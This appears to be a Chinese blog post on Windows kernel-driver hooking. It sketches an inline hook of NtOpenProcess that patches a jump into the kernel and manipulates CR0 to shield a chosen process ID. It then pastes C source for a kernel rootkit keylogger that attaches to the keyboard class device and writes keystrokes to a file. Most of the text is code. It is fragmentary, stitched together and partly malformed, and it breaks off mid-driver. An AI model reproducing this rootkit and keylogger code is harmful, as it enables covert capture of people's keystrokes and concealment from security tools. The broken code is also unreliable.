驱动InLine HOOK实例

   A、选取HOOK地址

   B、分析等HOOK函数参数

   C、构建HOOK 代码

   D、实现HOOK

   E、测试效果

 

 32 ssdt hook

 

eb ba52c07e 90

u nt!NtOpenProcess

u nt!NtOpenProcess l 100

jmp //0xE9

//jmp my_NtOpenProcess

// NtOpenProcess=jmp my_NtOpenProcess // my_NtOpenProcess-RealNtOpenProcess-5;

 

// 定义一下NtOpenProcess的原型

extern "C"    typedef  NTSTATUS      __stdcall NTOPENPROCESS

(

 OUT PHANDLE ProcessHandle,

 IN ACCESS_MASK AccessMask,

 IN POBJECT_ATTRIBUTES ObjectAttributes,

 IN PCLIENT_ID ClientId

 );

NTOPENPROCESS   *  RealNtOpenProcess;

 

PEPROCESS  EP;

 

// 自定义的NtOpenProcess函数 ZwOpenProcess

#pragma PAGECODE

   NTSTATUS  __declspec(naked__stdcall MyNtOpenProcess(

         OUT     PHANDLE ProcessHandle,

         IN     ACCESS_MASK DesiredAccess,

         IN     POBJECT_ATTRIBUTES ObjectAttributes,

         IN     PCLIENT_ID ClientId )

         NTSTATUS     rc;

         HANDLE       PID;

 

         KdPrint(("++++++++++++Entry MyNtOpenProcess int   ++++++++++++++\n")); 

 

         //rc = (NTSTATUS)RealNtOpenProcess( ProcessHandle, DesiredAccess, ObjectAttributes, ClientId );   

 

         if( (ClientId != NULL) )

         {

                   PID = ClientId->UniqueProcess;  

                   KdPrint(( "------------------------- PID=%d--------------\n",(int*)PID ));

 

                   // 如果是被保护的PID,则拒绝访问,并将句柄设置为空

                   if(PID == MyPID)

                   {

                            KdPrint(("被保护进程 MyPID=%d \n",(int)MyPID));

                            //调试输出 类似C语言的 Printf

                            ProcessHandle = NULL; //这个是关键

                            rc = STATUS_ACCESS_DENIED; //这个返回值

                            //PsLookupProcessByProcessId((ULONG)PID,&EP);

                            EP=PsGetCurrentProcess();                    

                            KdPrint((" ACESS Process Name  --:%s--   \n",(PTSTR)((ULONG)EP+0x174)));

                            __asm

                            {     // int 3

                                     // add esp,10 //弹出4个参数

                                     retn 0x10

                            }

 

                   }

         }

         __asm

         {     // int 3

                     // add esp,10 //弹出4个参数

                       push  0x0C4

                            mov eax,RealNtOpenProcess

                            add eax,5

                            jmp eax

         }

//       return rc;

}

         SSDT_Adr=(PLONG)*SSDT_Adr;// 0xE9

         ULONG    jmpaddr= (ULONG)MyNtOpenProcess- (ULONG)RealNtOpenProcess-5; //SSDT HOOK 

         __asm

         {   mov  ebx,SSDT_Adr

             mov eax,jmpaddr

             mov  BYTE ptr ds:[ebx],0xe9

                   mov  DWORD ptr ds:[ebx+1],eax

                   int 3

                   mov     eax, cr0

                   or     eax, 10000h

                   mov     cr0, eax

                   sti

         }  

C语言写的ROOT记录器,编译通过了.#include "stdafx.h" #include "ScanCode.h" #include "DriverEntry.h" #include <stdarg.h> const WCHAR *DEVICE_NAME = L"\\Device\\MonkeyKingDeviceName"; const WCHAR *SYMOBL_NAME = L"\\??\\MonkeyKingSymbolicName"; const char *NT_DEVICE_NAME = "\\Device\\KeyboardClass0"; const char *LOG_FILE_NAME = "\\DosDevices\\c:\\MonkeyKing.txt"; int numPendingIrps = 0; /*---------------------------------------------------------------------------------------------------------------------------------------------*/ /************************************************************************ * 函数名称:DriverEntry * 功能描述:初始化驱动程序,定位和申请硬件资源,创建内核对象 * 参数列表: pDriverObject:从I/O管理器中传进来的驱动对象 pRegistryPath:驱动程序在注册表的中的路径 * 返回 值:返回初始化驱动状态 *************************************************************************/ STDAPI_(NTSTATUS) DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) { NTSTATUS retValue = STATUS_SUCCESS; TRACEMSG("初始化例程..."); pDriverObject->DriverUnload = OnUnload; for (INT32 i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++){ pDriverObject->MajorFunction[i] = DispatchHandler; } pDriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead; TRACEMSG("初始化例程...完成"); //创建设备。 TRACEMSG("创建设备..."); PDEVICE_OBJECT pKeyboardDevice = NULL; if (!NT_SUCCESS(retValue = CreateDevice(pDriverObject, &pKeyboardDevice))) { TRACEMSG("创建设备...失败"); return retValue; } TRACEMSG("创建设备...完成。键盘设备对象指针为:0x%x", pKeyboardDevice); //挂接设备。 TRACEMSG("挂接设备..."); if (!NT_SUCCESS(retValue = HookKeyboard(pKeyboardDevice))) { TRACEMSG("挂接设备...失败"); return retValue; } TRACEMSG("挂接设备...完成"); TRACEMSG("初始化线程..."); if (!NT_SUCCESS(retValue = InitThreadLogger(pDriverObject))) { TRACEMSG("初始化线程...失败"); return retValue; } TRACEMSG("初始化线程...完成");
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小蚂蚁_CrkRes

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值